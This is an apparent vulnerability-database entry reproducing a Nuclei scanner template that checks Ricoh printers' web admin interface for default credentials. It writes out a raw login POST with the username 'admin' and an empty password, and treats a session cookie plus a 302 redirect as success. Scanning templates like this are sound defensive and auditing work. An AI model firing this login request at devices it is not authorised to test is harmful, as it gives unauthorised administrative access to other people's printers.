ricoh-default-login: Ricoh Default Login

日期: 2025-08-01 | 影响软件: Ricoh Default | POC: 已公开

漏洞描述

Ricoh default admin credentials were discovered.

PoC代码[已公开]

id: ricoh-default-login

info:
  name: Ricoh Default Login
  author: gy741
  severity: high
  description: Ricoh default admin credentials were discovered.
  reference:
    - https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: ricoh,default-login,vuln

http:
  - raw:
      - |
        POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: cookieOnOffChecker=on;

        wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open=

    payloads:
      username:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - 'wimsesid=[0-9]+'
        part: header

      - type: status
        status:
          - 302
# digest: 490a0046304402207c5c2811ebd3833333b2c95a2a7abef0901389ab79c4799fbed24242b8afc1d6022002625a44163237314f47e7aef3ce9958270a59ec4ae22dd359f4ad6729558ff4:922c64590222798bb761d5b6d8e72950